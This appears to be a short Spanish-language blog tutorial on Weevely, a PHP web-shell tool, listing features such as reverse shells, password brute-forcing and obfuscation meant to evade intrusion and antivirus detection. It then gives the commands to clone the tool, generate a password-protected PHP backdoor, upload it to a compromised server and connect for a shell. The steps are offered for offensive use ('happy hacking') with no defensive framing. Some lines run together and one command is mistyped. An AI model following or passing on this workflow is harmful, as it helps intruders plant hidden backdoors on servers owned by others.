Weevely es una herramienta de post-explotación de web , con la que conseguir acceso a un servidor por completo.
Los nuevos módulos para la nueva version 0.7 son
- More than 30 modules to automatize administration and post exploitation
- Ejecutar comandos y navegue sistema de archivos remoto, incluso con restricción de seguridad de PHP.
- Auditoría de errores de configuración de servidor comunes.
- Ejecutar consola SQL pivotante en la máquina de destino.
- Abrir proxy HTTP para hacer un túnel a través de su tráfico de destino.
- Fácil transferencia de archivos desde y hacia el objetivo.
- Engendro conchas TCP inversa y directa.
- Fuerza bruta las contraseñas de los usuarios del sistema de destino.
- Ejecutar escaneo de puertos de equipo de destino.
- Comunicaciones de puerta trasera se ocultan en las cookies HTTP.
- Las comunicaciones son ofuscado para eludir la detección NIDS firma.
- Backdoor código polimórfico PHP se ofusca para evitar HIDS detección AV.
- etc....=)Bu
Bueno , hay varias formas, yo os dire que lo podeis clonar con "git", lo que yo hize , ponemos este comando para clonarlo....
git clone https://github.com/epinna/Weevely WeevelyBueno, es sencillo no? colocan eso y weevely estara en su carpeta llamada Weevely, sencillo? por si no les gusta esta forma acá les dejo la web , para que escojan la suya
http://epinna.github.io/Weevely/Usando Weevely.
Bueno entramos en la carpeta, y para hacer un pequeño backdoor , sencillito , colocamos lo siguiente :
Python weevely.py generate "Contraseña" "Ruta del archivo"Bueno, con eso , hariamos un backdoor, un ejemplo seria así :
Python weevely.py generate hacker /home/icebreaker/Escritorio/backdoor.php
y así lo creamos , lo subimos al servidor infectado , una vez hecho esto para conectarnos, lo hacemos de la siguiente forma con el siguiente comando...
python weevli "web+el backdoor" "contraseña"Y así conseguimos una shell , probamos poniendo ls .......
Bueno , y acá se puede ver conectado espero que les gustes y happy hacking! :-D